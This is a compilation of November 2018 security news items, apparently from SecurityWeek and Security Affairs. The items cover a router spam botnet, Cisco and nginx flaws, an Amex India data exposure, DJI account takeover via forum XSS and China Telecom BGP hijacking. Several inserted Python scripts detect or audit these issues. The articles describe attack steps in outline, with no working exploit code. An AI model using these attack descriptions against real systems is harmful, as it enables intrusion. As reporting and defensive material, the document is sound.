Even businesses that provide non-DoD-related services could become limited by not focusing on appropriate levels of cybersecurity. If other government agencies follow the DoD’s lead and make cybersecurity a priority, the businesses that provide services to government-run entities like public schools or veterans’ affairs hospitals could find their federal associations ceasing.

Breaches Bring About Worldwide Headlines
The worst cybersecurity breaches attract attention around the world. The total number of victims could rise to the millions, and some attacks even threaten local infrastructure, such as power grids. Although the emphasis here was on U.S. cybersecurity, the matter of staying safe from online threats is a global concern.

It’s not difficult to see why government entities know they can’t afford to do business with companies that aren’t well protected against cybersecurity issues.

When businesses neglect cybersecurity, they could get sued under the FCA, lose government contracts and suffer substantial reputational damage.

BCMPUPnP_Hunter Botnet infected 400k routers to turn them into email spammers
9.11.2018 securityaffairs

Security researchers at 360 Netlab have discovered a new spam botnet, dubbed BCMPUPnP_Hunter, that likely already infected around 400,000 machines to date.
Security experts from 360 Netlab security firm have recently discovered a new spam botnet, dubbed BCMPUPnP_Hunter, that mainly targets routers that have the BroadCom UPnP feature enabled.

The BCMPUPnP_Hunter was first spotted in September, but researchers were able to capture the first sample only a month later.

Experts pointed out that the interaction between the botnet and a potential target takes multiple steps, starting with a TCP port 5431 destination scan.

“it starts with tcp port 5431 destination scan, then moving on to check target’s UDP port 1900 and wait for the target to send the proper vulnerable URL.” reads the analysis published by 360 Netlab.

“After getting the proper URL, it takes another 4 packet exchanges for the attacker to figure out where the shellcode’s execution start address in memory is so a right exploit payload can be crafted and fed to the target.”

Experts noticed that the scale of the infection is very large: the number of active scanning IPs in each scan event is about 100,000.

Once the device is compromised, the attacker implements a proxy network (tcp-proxy) that communicates with well-known mail servers such as Outlook, Hotmail, Yahoo! Mail, etc. This circumstance suggests the botnet may have been involved in spam campaigns.

Below are some findings shared by the experts:

It can be seen that the scan activity picks up every 1-3 days. The number of active scanning IPs in each single event is about 100,000.
All together we have 3.37 million unique scan source IPs. It is a big number, but it is likely that the IPs of the same infected devices just changed over time.
The number of potential infections may reach 400,000 according to Shodan based on the search of banner: Server: Custom/1.0 UPnP/1.0 Proc/Ver
The geographical distribution for the scanner IPs in the last 7 days revealed that most of the infected devices are in India, the United States, and China.


The experts probed the scanners and discovered at least 116 different types of infected devices.

The malware sample analyzed by the experts is composed of the main body and a shellcode that is apparently designed specifically to download the main sample and execute it.

“The main function of shellcode is to download the main sample from C2 and execute it.” continues the analysis.

“The shellcode has a full length of 432 bytes, very neatly organized and written, some proofs below (We did not find similar code using search engines). It seems that the author has profound skills and is not a typical script kid:”

The main sample includes an exploit for the BroadCom UPnP vulnerability and the proxy access network module. The main sample can parse four instruction codes from the C2: enable the port scan, search for a potentially vulnerable target, empty the current task, and access the proxy network.

The botnet was likely designed to proxy traffic to servers of well-known mail service providers. The researchers believe the proxy network established by the botnet is abused for spam due to the connections only made over TCP port 25.

New Spam Botnet Likely Infected 400,000 Devices
9.11.2018 securityweek
BotNet  Spam

A newly discovered botnet that appears designed to send spam emails likely infected around 400,000 machines to date, 360 Netlab security researchers warn.

Dubbed BCMPUPnP_Hunter, the threat was observed mainly targeting routers that have the BroadCom UPnP feature enabled. The botnet emerged in September, but a multi-step interaction between the botnet and the potential target prevented the researchers from capturing a sample until last month.

The interaction, 360 Netlab explains, starts with tcp port 5431 destination scan, after which the malware checks the target’s UDP port 1900 and then waits for the proper vulnerable URL. After four other packet exchanges, the attacker finally figures out the shellcode's execution start address in memory and delivers the proper exploit.

Following a successful attack, a proxy network is implemented, to communicate with well-known mail servers such as Outlook, Hotmail, Yahoo! Mail, and others, most likely with the intent to engage in spam activities.

Over the past month, the number of scanning source IPs has been constantly in the 100,000 range, though it also dropped below the 20,000 mark roughly two weeks ago. The scan activity picks up every 1-3 days, with around 100,000 scan source IPs involved in each scan event.

Overall, the researchers registered over 3.37 million scan source IPs, but they believe this large number is the result of some devices changing their IP over time.

By probing the scanners, 360 Netlab managed to obtain information on 116 different types of infected devices. The botnet is believed to have infected around 400,000 devices all around the world, with the highest concentration in India, the United States, and China.

The analyzed malware sample consists of a shellcode and the main body. The shellcode, apparently designed specifically to download the main sample and execute it, seems to have been created by a skilled developer, the researchers point out.

The main sample includes an exploit for the BroadCom UPnP vulnerability, as well as the proxy access network module, and can parse four instruction codes from the command and control (C&C) server: an initial packet without practical functionality, and commands to search for vulnerable targets, to empty the current task, and to launch the proxy service.

The botnet, the researchers say, appears designed to proxy traffic to servers of well-known mail service providers. With connections only made over TCP port 25 (which is used by SMTP - Simple Mail Transfer Protocol), the researchers are confident the proxy network established by the botnet is abused for spam.
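The two articles above describe the same probe sequence (a TCP port 5431 scan followed by a UDP port 1900 check) and the Shodan banner 360 Netlab used to count exposed devices. The following detection script is an added example, not 360 Netlab's code: it flags sources that perform that two-step probe against the same destination within a short window, and checks a device's HTTP headers for the banner. The log format (timestamp, protocol, source, destination, destination port) is a constructed simplification of a firewall or NetFlow export.

```python
"""Flag the BCMPUPnP_Hunter probe sequence in connection logs and the
banner of the targeted UPnP stack (added example, not 360 Netlab's code)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
2018-11-01T10:00:01 tcp 198.51.100.7 203.0.113.5 5431
2018-11-01T10:00:02 udp 198.51.100.7 203.0.113.5 1900
2018-11-01T10:00:03 tcp 198.51.100.7 203.0.113.9 5431
2018-11-01T10:05:00 tcp 192.0.2.44 203.0.113.5 443
2018-11-01T10:05:01 udp 192.0.2.44 203.0.113.5 1900
2018-11-01T10:06:00 tcp 198.51.100.8 203.0.113.5 5431
2018-11-01T11:30:00 udp 198.51.100.8 203.0.113.5 1900
"""

SCAN_TCP_PORT = 5431            # step 1 of the probe described by 360 Netlab
SSDP_UDP_PORT = 1900            # step 2: UPnP/SSDP check on the same target
PAIRING_WINDOW = timedelta(minutes=10)   # assumed window; tune for your network

# Banner 360 Netlab searched for on Shodan to estimate the infected population.
UPNP_BANNER = "Server: Custom/1.0 UPnP/1.0 Proc/Ver"


def parse_log(log_text):
    """Parse the constructed format into (timestamp, proto, src, dst, dport)."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, proto, src, dst, dport = line.split()
        events.append((datetime.fromisoformat(ts), proto.lower(), src, dst, int(dport)))
    return events


def find_probe_sequences(log_text, window=PAIRING_WINDOW):
    """Return {src: [dst, ...]} for sources that hit TCP/5431 on a destination
    and then UDP/1900 on the same destination within `window`."""
    events = sorted(parse_log(log_text))
    first_step = defaultdict(list)   # (src, dst) -> timestamps of TCP/5431 probes
    hits = defaultdict(list)
    for ts, proto, src, dst, dport in events:
        if proto == "tcp" and dport == SCAN_TCP_PORT:
            first_step[(src, dst)].append(ts)
        elif proto == "udp" and dport == SSDP_UDP_PORT:
            earlier = first_step.get((src, dst), [])
            if any(timedelta(0) <= ts - t0 <= window for t0 in earlier):
                if dst not in hits[src]:
                    hits[src].append(dst)
    return dict(hits)


def banner_matches(http_response):
    """True if an HTTP/SSDP response carries the banner associated with the
    Broadcom UPnP stack the botnet targets (exact header match)."""
    return any(line.strip().lower() == UPNP_BANNER.lower()
               for line in http_response.splitlines())


if __name__ == "__main__":
    for src, dsts in find_probe_sequences(SAMPLE_LOG).items():
        print(f"probe sequence from {src} against {', '.join(dsts)}")
```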

Default Account Exposes Cisco Switches to Remote Attacks
9.11.2018 securityweek

A default account present in Cisco Small Business switches can allow remote attackers to gain complete access to vulnerable devices. The networking giant has yet to release patches, but a workaround is available.

According to Cisco, Small Business switches running any software release come with a default account that is provided for the initial login. The account has full administrator privileges and it cannot be removed from the system.

The account is disabled if an administrator configures at least one other user account with the access privilege set to level 15, which is equivalent to root/administrator and provides full access to the switch. However, if no level 15 accounts are configured or existing level 15 accounts are removed from the device, the default account is re-enabled and the administrator is not notified.

Malicious actors can leverage this account to log in to a device and execute arbitrary commands with full admin privileges.

The vulnerability, tracked as CVE-2018-15439, was reported to Cisco by Thor Simon of Two Sigma Investments LP. The vendor says it’s not aware of any attempts to exploit the vulnerability for malicious purposes.

The flaw affects Cisco Small Business 200, 300 and 500 series switches, Cisco 250 and 350 series smart switches, and Cisco 350X and 550X series stackable managed switches. The vendor says Cisco 220 series smart switches are not impacted.

Until Cisco releases a patch, users have been advised to add at least one user account with privilege level 15 to their device’s configuration. The company’s advisory contains detailed instructions on how such accounts can be configured.
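Because the default account is silently re-enabled whenever no level-15 user exists, a useful check is to audit backed-up switch configurations for at least one such account. The script below is an added example, not Cisco's tooling; it assumes local users appear in the config as IOS-style `username NAME ... privilege N ...` lines and treats a `username` line without a `privilege` keyword as level 1. The two configurations are constructed.

```python
"""Audit a Cisco Small Business switch configuration for a privilege-15
account (added example, not Cisco's tooling)."""
import re

# Assumed line shape: "username NAME ... privilege N ..." (case-insensitive).
USERNAME_RE = re.compile(r"^\s*username\s+(?P<name>\S+)(?P<rest>.*)$", re.IGNORECASE)
PRIV_RE = re.compile(r"\bprivilege\s+(?P<level>\d+)\b", re.IGNORECASE)
DEFAULT_LEVEL = 1   # assumed default when no privilege keyword is present


def local_accounts(config_text):
    """Return [(name, privilege_level), ...] for every local user in the config."""
    accounts = []
    for line in config_text.splitlines():
        m = USERNAME_RE.match(line)
        if not m:
            continue
        p = PRIV_RE.search(m.group("rest"))
        accounts.append((m.group("name"), int(p.group("level")) if p else DEFAULT_LEVEL))
    return accounts


def default_account_would_be_enabled(config_text):
    """True when the config defines no level-15 user, which is the condition
    under which the undeletable default account (CVE-2018-15439) is re-enabled."""
    return not any(level == 15 for _, level in local_accounts(config_text))


# Constructed configurations; password hashes replaced by placeholders.
WEAK_CONFIG = """\
hostname sw-weak
username operator password encrypted PLACEHOLDER privilege 1
"""

FIXED_CONFIG = """\
hostname sw-fixed
username operator password encrypted PLACEHOLDER privilege 1
username netadmin password encrypted PLACEHOLDER privilege 15
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("fixed", FIXED_CONFIG)):
        state = "ENABLED" if default_account_would_be_enabled(cfg) else "disabled"
        print(f"{label}: default account {state}; users={local_accounts(cfg)}")
```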

Cisco has also informed customers of a critical authentication bypass vulnerability affecting the management console in its Stealthwatch Enterprise product. A remote attacker can exploit the vulnerability to bypass authentication and execute arbitrary commands with admin rights.

Another critical vulnerability that allows arbitrary command execution with elevated privileges has been found in Cisco Unity Express.

Patches are available for both the Unity Express and the Stealthwatch Enterprise flaws and there is no evidence of malicious exploitation.

Cisco recently rolled out patches for a denial-of-service (DoS) vulnerability impacting some of its security appliances. The security hole has been exploited in attacks and the company released fixes only a week after disclosure.

Man Behind DDoS Attacks on Gaming Companies Pleads Guilty
9.11.2018 securityweek
A 23-year-old man from Utah pleaded guilty this week to launching distributed denial-of-service (DDoS) attacks against several online gaming companies in 2013 and 2014.

According to the U.S. Justice Department, Austin Thompson targeted servers belonging to Sony Online Entertainment (later spun off and renamed Daybreak Game Company) and other companies. The man announced his attacks via the Twitter account @DerpTrolling.

The account still exists, but it hasn’t been active since January 2016, when it resumed tweeting after a break of more than one year.

Thompson has pleaded guilty to causing damage that exceeds $95,000 to a protected computer, for which he faces up to 10 years in prison, a fine of $250,000, and 3 years of supervised release. His sentencing is scheduled for March 1, 2019.

While authorities charged the Utah man for attacks between 2013 and 2014, DerpTrolling was active since 2011. DerpTrolling made some headlines in 2013 and 2014 after disrupting online gaming servers owned by EA, Sony, Riot Games, Microsoft, Nintendo and Valve.

At one point, the cybercriminal leaked some account credentials allegedly belonging to PlayStation Network, Windows Live and 2K Games users, but it later turned out that the data was either fake or not obtained as a result of a breach, as DerpTrolling claimed.

“Denial-of-service attacks cost businesses millions of dollars annually,” said U.S. Attorney Adam Braverman. “We are committed to finding and prosecuting those who disrupt businesses, often for nothing more than ego.”

DJI Drone Vulnerability Exposed Customer Data, Flight Logs, Photos and Videos
9.11.2018 securityweek

Vulnerability Exposed DJI Customer Data and Drone Flight Logs, Photos and Videos Generated During Drone Flights

In August 2017 the U.S. Immigration and Customs Enforcement agency (ICE) issued an intelligence bulletin warning that Da Jiang Innovations (DJI) -- the world's largest drone manufacturer -- was "likely passing U.S. critical infrastructure and law enforcement data to [the] Chinese government." DJI strenuously denied the accusation.

Now Check Point Research has published details of a DJI vulnerability that would allow the Chinese government -- or anybody else in the world -- to simply take that data without any involvement from DJI. The vulnerability could provide full access to a drone user's DJI account. A successful attacker would be able to obtain cloud-based flight records, stored photographs, user PII including credit card details -- and a real-time view from the drone's camera and microphone.

The vulnerability, providing access to users' personal details, would be attractive to cybercriminals around the world. The flight records could also be used to track delivery drones to determine where deliveries are made in order to intercept and steal them.

The live camera view would be attractive to nation-state actors involved in critical infrastructure reconnaissance. Indeed, last year's ICE bulletin notes that the Los Angeles Sheriff's Office had announced its intention to deploy DJI drones for "barricaded suspects, hostage situations and other high-risk tactical operations, hazardous materials incidents, and fire related incidents."

It also notes that the contractor building a DHS National Bio and Agro-Defense Facility in Manhattan, Kansas, is using DJI drones "to assist with construction layout and provide security during construction."

The business and facility use of drones is growing rapidly. Check Point describes the potential espionage value in more detail. "For those looking to target critical infrastructure facilities such as energy plants or water dams," the researchers write, "analyzing intricate details and images of such facilities could easily reveal information that would prove highly useful in a future attack."

It points out that threat actors would be able to home in on various technologies to find out which vendor of CCTV cameras or biometric/electronic door locks an enterprise may be using. These products and suppliers could then be investigated to find the correct tools that could bypass them. "Indeed," says the Check Point report, "having a detailed view of sensitive areas could reveal to criminals and potential terrorists where security gaps in general may lie, and pave the path to exploiting those gaps."

This vulnerability, Oded Vanunu, head of products vulnerability research at Check Point, told SecurityWeek, "is a unique opportunity for malicious actors to gain priceless information -- you have an eye in the sky. Organizations are moving towards automated flights, sometimes with dozens of drones patrolling across sensitive facilities. With this vulnerability you could take over the accounts and see and hear everything that the drones see or hear. This is a huge opportunity for malicious actors."

It would be attractive to general criminals to gain PII and use or resell it, and for criminals and state actors to use "in targeted attacks against cities or sensitive facilities."

The vulnerability itself involves a loophole in DJI's customer identification. By attacking the token used to identify registered users across the various DJI services, Check Point gained access to all the DJI platforms. It required registering an account within the DJI user forum and then posting an XSS attack. "Unlike most account takeovers, though, that rely on social engineering methods to fool the target victim into sending the attacker their login credentials," note the researchers, "our team simply collected the user's identifying token via a regular looking link posted in DJI's forum to essentially hack into the victim's account across all platforms."

Once the identifying token is acquired, an attacker would be able to hijack the account, log in and gain access to the flight and personal data registered to the user's drone.

Check Point reported the vulnerability to DJI, and it was fixed on September 28, 2018.

A statement from DJI sent to SecurityWeek confirms the problem. "Check Point's researchers discovered that DJI's platforms used a token to identify registered users across different aspects of the customer experience, making it a target for potential hackers looking for ways to access accounts. DJI users who had manually uploaded photos, videos or flight logs to DJI's cloud servers could have seen that data become vulnerable to hacking. It could have also allowed access to some customer information, and users on the DJI FlightHub fleet management system could have had live flight information accessed as well."

DJI engineers subsequently classified the vulnerability as high risk, but low probability. The high risk is clear; but the low probability is explained as the necessity for "a complicated set of preconditions to be successfully exploited: The user would have to be logged into their DJI account while clicking on a specially-planted malicious link in the DJI Forum."

There is, adds the DJI statement, "no evidence it was ever exploited." It is worth noting, however, Check Point's closing comment: "the admin would not receive any notification that an attacker has accessed their account. Meanwhile, the attacker would have completely uninhibited access to login and view the drone's camera during live operations of any flights currently in progress, or download records of previously recorded flights that had been uploaded to the FlightHub platform."

Several Vulnerabilities Patched in nginx
9.11.2018 securityweek

Updates released this week for the nginx open source web server software address several denial-of-service (DoS) vulnerabilities.

In addition to providing web server functionality, Nginx can be used as a load balancer and a reverse proxy. It powers roughly 400 million websites, which makes it one of the most widely used web servers. NGINX, Inc., the company behind nginx, has raised over $100 million, including $43 million in June 2018.

Nginx developers announced this week that versions 1.15.6 and 1.14.1 address two HTTP/2 implementation vulnerabilities that can lead to a DoS condition. The issues impact versions 1.9.5 through 1.15.5.

One of the flaws, tracked as CVE-2018-16843, can result in excessive memory consumption. The other security bug, discovered by Gal Goldshtein from F5 Networks and identified as CVE-2018-16844, can cause excessive CPU usage.

“The issues affect nginx compiled with the ngx_http_v2_module (not compiled by default) if the ‘http2’ option of the ‘listen’ directive is used in a configuration file,” explained nginx core developer Maxim Dounin.

Website administrators using nginx were also informed of a security hole affecting the ngx_http_mp4_module module, which provides pseudo-streaming support for MP4 media files.

The vulnerability, tracked as CVE-2018-16845, can allow an attacker to cause the worker process to crash or leak memory by getting the module to process a specially crafted MP4 file.

“The issue only affects nginx if it is built with the ngx_http_mp4_module (the module is not built by default) and the ‘mp4’ directive is used in the configuration file,” Dounin explained. “Further, the attack is only possible if an attacker is able to trigger processing of a specially crafted mp4 file with the ngx_http_mp4_module.”

This vulnerability impacts nginx 1.1.3 and later and 1.0.7 and later, and it was also patched with the release of versions 1.15.6 and 1.14.1 on November 6.
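Since each of the three nginx flaws only applies when the module is compiled in and the matching directive is used, an administrator can decide exposure from `nginx -V` output and the configuration. The script below is an added example, not nginx project code; it encodes the version ranges and conditions quoted above, and does not follow `include` directives, so included files must be concatenated first. The `nginx -V` output and configuration are constructed.

```python
"""Determine exposure to CVE-2018-16843/16844 (HTTP/2) and CVE-2018-16845
(mp4) from `nginx -V` output and a config (added example, not nginx code)."""
import re

HTTP2_CVES = {"CVE-2018-16843", "CVE-2018-16844"}
MP4_CVE = "CVE-2018-16845"


def parse_version(nginx_v_output):
    """Extract (major, minor, patch) from the 'nginx version: nginx/x.y.z' line."""
    m = re.search(r"nginx version: nginx/(\d+)\.(\d+)\.(\d+)", nginx_v_output)
    if not m:
        raise ValueError("no nginx version line found")
    return tuple(int(x) for x in m.groups())


def is_patched(ver):
    """Fixes shipped in 1.15.6 (mainline) and 1.14.1 (stable)."""
    return ver >= (1, 15, 6) or (ver[:2] == (1, 14) and ver[2] >= 1)


def strip_comments(config_text):
    return "\n".join(line.split("#", 1)[0] for line in config_text.splitlines())


def uses_http2_listen(config_text):
    """True if any `listen ... http2;` directive enables HTTP/2."""
    return re.search(r"^\s*listen\b[^;]*\bhttp2\b", strip_comments(config_text), re.M) is not None


def uses_mp4_directive(config_text):
    """True if the `mp4;` pseudo-streaming directive is used."""
    return re.search(r"^\s*mp4\s*;", strip_comments(config_text), re.M) is not None


def exposure(nginx_v_output, config_text):
    """Return the set of CVE ids this build + configuration is exposed to."""
    ver = parse_version(nginx_v_output)
    cves = set()
    if is_patched(ver):
        return cves
    # HTTP/2 issues: 1.9.5 through 1.15.5, ngx_http_v2_module built, http2 listen.
    if (ver >= (1, 9, 5) and "--with-http_v2_module" in nginx_v_output
            and uses_http2_listen(config_text)):
        cves |= HTTP2_CVES
    # mp4 issue: 1.1.3+ and 1.0.7+, ngx_http_mp4_module built, mp4 directive.
    in_mp4_range = ver >= (1, 1, 3) or (1, 0, 7) <= ver < (1, 1, 0)
    if (in_mp4_range and "--with-http_mp4_module" in nginx_v_output
            and uses_mp4_directive(config_text)):
        cves.add(MP4_CVE)
    return cves


# Constructed `nginx -V` output and configuration, not taken from a real host.
SAMPLE_NGINX_V = """\
nginx version: nginx/1.14.0
built with OpenSSL 1.1.0g  2 Nov 2017
configure arguments: --with-http_ssl_module --with-http_v2_module --with-http_mp4_module
"""

SAMPLE_CONF = """\
http {
    server {
        listen 443 ssl http2;
        location /video/ {
            mp4;   # pseudo-streaming for .mp4 files
        }
    }
}
"""

if __name__ == "__main__":
    print(sorted(exposure(SAMPLE_NGINX_V, SAMPLE_CONF)))
```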

689,272 plaintext records of Amex India customers exposed online
9.11.2018 securityaffairs Hacking 

A database holding 689,272 plaintext records of Amex India customers was exposed online via an unsecured MongoDB server.
Personal details of nearly 700,000 American Express India (Amex India) customers were exposed online via an unsecured MongoDB server.

The huge trove of data was discovered by Bob Diachenko from cybersecurity firm Hacken. Most of the records were encrypted, but 689,272 records were stored in plaintext.

The expert located the database by using IoT search engines such as Shodan and BinaryEdge.io.

“On 23rd October I discovered an unprotected Mongo DB which allowed millions of records to be viewed, edited and accessed by anybody who might have discovered this vulnerability. The records appeared to be from an American Express branch in India.” states the blog post published by Diachenko.


The 689,272 plaintext records included personal details of Amex India customers: phone numbers, names, email addresses, and ‘type of card’ description fields.

The archive also included 2,332,115 records containing encrypted data (i.e. names, addresses, Aadhaar numbers, PAN card numbers, and phone numbers).

Bob Diachenko
Seems like @AmexIndia exposed its #MongoDB for a while, with some really sensitive data (base64 encrypted). Now secured (just when I was preparing responsible disclosure), but question remains how long it was open. Found with @binaryedgeio engine.

10:12 AM - Oct 25, 2018
“Upon closer examination, I am inclined to believe that the database was not managed by AmEx itself but instead by one their subcontractors who were responsible for SEO or lead generation. I came to this conclusion since many of the entries contained fields such as ‘campaignID’, ‘prequalstatus’ and ‘leadID’ etc.” added Diachenko.

Diachenko promptly reported his findings to Amex India, which immediately took down the server. At the time of writing it is not clear how long the server remained exposed online; Amex India, which investigated the case, declared that it did not discover any “evidence of unauthorized access.”

“We applaud AmEx’s rapid response to this issue, noting they immediately took down that server upon notification and began further investigations.” Diachenko concluded.

“As we learned from this incident, one never knows when transient firewall rules may inadvertently expose your development machines to the public. In this case, it appears to have only exposed some long-lost personal information of an unknown number of AmEx India customers, but for others, it could be critical intellectual property or even your entire subscriber base that is at risk of being exposed.”

Experts detailed how China Telecom used BGP hijacking to redirect traffic worldwide
9.11.2018 securityaffairs

Security researchers revealed in a recent paper that over the past years, China Telecom used BGP hijacking to misdirect Internet traffic through China.
Security researchers Chris C. Demchak and Yuval Shavitt revealed in a recent paper that over the past years, China Telecom has been misdirecting Internet traffic through China.

China Telecom was a brand of the state-owned China Telecommunications Corporation; after the marketization of the enterprise, the brand and the operating companies were spun off as a separate group.

China Telecom is currently present in North American networks with 10 points-of-presence (PoPs) (eight in the United States and two in Canada), spanning major exchange points.

The two researchers pointed out that the telco company leverages these PoPs to hijack traffic through China, something that has happened several times over the past years.

According to the experts, the activity went unnoticed for a long time. To better understand how it is possible to hijack the traffic, let’s read this excerpt from the paper:

“Within the BGP forwarding tables, administrators of each AS announce to their AS neighbors the IP address blocks that their AS owns, whether to be used as a destination or a convenient transit node.” states the paper.

“Errors can occur given the complexity of configuring BGP, and these possible errors offer covert actors a number of hijack opportunities. If network AS1 mistakenly announces through its BGP that it owns an IP block that actually is owned by network AS2, traffic from a portion of the Internet destined for AS2 will actually be routed to – and through – AS1. If the erroneous announcement was maliciously arranged, then a BGP hijack has occurred.”

On April 8th, 2010 China Telecom hijacked 15% of the Internet traffic for 18 minutes, experts speculate it was a large-scale experiment for controlling the traffic flows.

The incident also affected US government (‘‘.gov’’) and military (‘‘.mil’’) websites.

Many other similar cases were reported by the experts over the years. In December 2017, traffic for Google, Apple, Facebook, Microsoft, and other tech giants was routed through Russia; in that case too, experts speculated it was an intentional BGP hijacking.

According to the research paper, China Telecom used numerous PoPs to hijack domestic US and cross-US traffic, redirecting the flow to China over days, weeks, and months.

“The patterns of traffic revealed in traceroute research suggest repetitive IP hijack attacks committed by China Telecom.” continues the research.

“While one may argue such attacks can always be explained by ‘normal’ BGP behavior, these in particular suggest malicious intent, precisely because of their unusual transit characteristics –namely the lengthened routes and the abnormal durations,”

In February 2016, another attack hijacked traffic from Canada to Korean Government websites to China in what is defined as a perfect scenario of long-term cyber espionage.

“Starting from February 2016 and for about 6 months, routes from Canada to Korean government sites were hijacked by China Telecom and routed through China. Figure 2a shows the shortest and normal route: Canada-US-Korea.” continues the report.

“As shown in figure 2b, however, the hijacked route started at the China Telecom PoP in Toronto, the traffic was then forwarded inside the Chinese network to their PoP on the US West Coast, from there to China, and finally to delivery in Korea.”


A similar attack occurred in October 2016, when traffic from several locations in the USA to the headquarters of a large Anglo-American bank in Milan, Italy was hijacked by China Telecom to China.

Another incident has happened on December 9, 2015, when traffic to Verizon APAC was hijacked through China Telecom. In response to the incident two of the major carriers of the affected routes implemented filters to refuse Verizon routes from China Telecom.

The security experts described many other BGP hijacking attacks involving China Telecom, further info is reported in the research paper.

Security experts are pushing for the adoption of solutions to protect BGP; Cloudflare, for example, maintains that Resource Public Key Infrastructure (RPKI) could secure BGP routing.
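The paper's excerpt above describes the hijack as AS1 announcing a block that AS2 actually owns; RPKI route-origin validation (RFC 6811) is the check that lets a router reject such an announcement. The following is an added example, not code from the paper or from Cloudflare: it validates an announcement's (prefix, origin AS) against a constructed ROA set using documentation prefixes and private AS numbers, and shows how the hijack, including the more-specific variant, comes out INVALID while the legitimate route is VALID.

```python
"""RFC 6811 route-origin validation against a constructed ROA set
(added example; not from the paper, Cloudflare, or any router vendor)."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class ROA:
    prefix: str       # prefix the resource holder authorised, e.g. "203.0.113.0/24"
    max_length: int   # longest prefix length the holder permits to be announced
    origin_as: int    # AS number authorised to originate the prefix


VALID, INVALID, NOT_FOUND = "VALID", "INVALID", "NOT_FOUND"


def validate_origin(announced_prefix, origin_as, roas):
    """Classify one BGP announcement as VALID, INVALID or NOT_FOUND.

    A ROA "covers" the announcement when the announced prefix lies inside the
    ROA prefix. With no covering ROA the state is NOT_FOUND; with a covering
    ROA whose origin AS matches and whose max_length is not exceeded it is
    VALID; with covering ROAs but no such match it is INVALID.
    """
    net = ipaddress.ip_network(announced_prefix, strict=False)
    covering = []
    for roa in roas:
        roa_net = ipaddress.ip_network(roa.prefix, strict=False)
        if net.version == roa_net.version and net.subnet_of(roa_net):
            covering.append(roa)
    if not covering:
        return NOT_FOUND
    for roa in covering:
        if roa.origin_as == origin_as and net.prefixlen <= roa.max_length:
            return VALID
    return INVALID


def accepted_routes(announcements, roas):
    """Apply the usual policy of dropping INVALID routes; NOT_FOUND is kept
    because most of the Internet still has no ROA for its prefixes."""
    return [(prefix, asn) for prefix, asn in announcements
            if validate_origin(prefix, asn, roas) != INVALID]


# Constructed ROAs (documentation prefixes, private AS numbers), not real data.
# AS64500 plays "AS2" (the legitimate owner) from the paper's wording.
ROAS = (
    ROA("203.0.113.0/24", 24, 64500),
    ROA("198.51.100.0/22", 24, 64501),
)

# Constructed announcements: the legitimate route, the hijack by "AS1"
# (AS64496), and a more-specific hijack that exceeds the ROA's max_length.
ANNOUNCEMENTS = [
    ("203.0.113.0/24", 64500),
    ("203.0.113.0/24", 64496),
    ("203.0.113.0/25", 64500),
    ("192.0.2.0/24", 64496),
]

if __name__ == "__main__":
    for prefix, asn in ANNOUNCEMENTS:
        print(f"{prefix} from AS{asn}: {validate_origin(prefix, asn, ROAS)}")
```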

U.S. Cyber Command Shares Malware via VirusTotal
8.11.2018 securityweek 

The U.S. Cyber Command (USCYBERCOM) this week started sharing malware samples with the cybersecurity industry via Chronicle’s VirusTotal intelligence service.

The project is run by USCYBERCOM’s Cyber National Mission Force (CNMF), which will post unclassified malware samples on the CYBERCOM_Malware_Alert account on VirusTotal.

“Recognizing the value of collaboration with the public sector, the CNMF has initiated an effort to share unclassified malware samples it has discovered that it believes will have the greatest impact on improving global cybersecurity,” USCYBERCOM stated.

CNMF claims that its goal is to “to help prevent harm by malicious cyber actors by sharing with the global cybersecurity community.”

Members of the cybersecurity industry can keep track of each new malware sample shared by CNMF through a dedicated Twitter account named USCYBERCOM Malware Alert (@CNMF_VirusAlert). The Twitter account currently has over 3,000 followers and the VirusTotal account is already trusted by more than 50 users.

The first malware samples shared by CNMF on VirusTotal are part of the Lojack (LoJax) family, which researchers observed recently in attacks apparently carried out by the Russia-linked cyber espionage group tracked as Sofacy, APT28, Fancy Bear, Pawn Storm, Sednit and Strontium.

The samples, contained in files named rpcnetp.exe and rpcnetp.dll, seem to be new and related to the UEFI rootkit analyzed by ESET after being used by the Russian threat actor to target government organizations in Central and Eastern Europe.

USCYBERCOM shares malware samples on VirusTotal

USCYBERCOM shares malware samples on VirusTotal

USCYBERCOM shares malware samples on VirusTotal

The Starter Pistol Has Been Fired for Artificial Intelligence Regulation in Europe
8.11.2018 securityweek 

Artificial Intelligence Regulation - Is it needed?

Regulation of Artificial Intelligence Could Potentially be More Complex and Far Reaching Than GDPR

Paul Nemitz is principal advisor in the Directorate-General Justice and Consumers of the European Commission. It was Nemitz who transposed the underlying principles of data privacy into the legal text that ultimately became the European Union's General Data Protection Regulation (GDPR).

Now Nemitz has fired the starting gun for what may eventually become a European Regulation providing consumer safeguards against abuse from artificial intelligence (AI). In a new paper published in the Philosophical Transactions of the Royal Society, he warns that democracy itself is threatened by unbridled use of AI.

In the paper titled, 'Constitutional democracy and technology in the age of artificial intelligence', he warns that too much power, including AI research, is concentrated in the hands of what he calls the 'frightful five' (a term used by the New York Times in May 2017): Google, Apple, Facebook, Amazon and Microsoft, also known as GAFAM. His concern is that these and other tech companies have always argued that tech should be above the law because the law does not understand tech and cannot keep up with it.

Their argument, he suggests, is epitomized in Google's argument in the Court of Justice of the European Union (CJEU) disputing the applicability of EU law on data protection to its search engine, "basically claiming that the selection process of its search engine is beyond its control due to automation in the form of an algorithm."

The implication of this argument is that the working of AI should not be subject to national laws simply because the purveyors of AI don't understand how its decisions are reached. Nemitz believes this attitude undermines the very principles of democracy itself. While democracy and laws are concerned with the good of the people, big business is concerned almost exclusively with profit.

He gets some support from the UK's Information Commissioner Elizabeth Denham. In an unrelated blog published November 6, 2018 discussing the ICO's investigation into the Facebook/Cambridge Analytica issue, she writes, "We are at a crossroads. Trust and confidence in the integrity of our democratic processes risks being disrupted because the average person has little idea of what is going on behind the scenes."

"It is these powerful internet technology corporations which have already demonstrated that they cannot be trusted to pursue public interest on a grand scale without the hard hand of the law and its rigorous enforcement setting boundaries and even giving directions and orientation for innovation which are in the public interest," writes Nemitz. He continues, "In fact, some representatives of these corporations may have themselves recently come to this conclusion and called for legislation on AI."

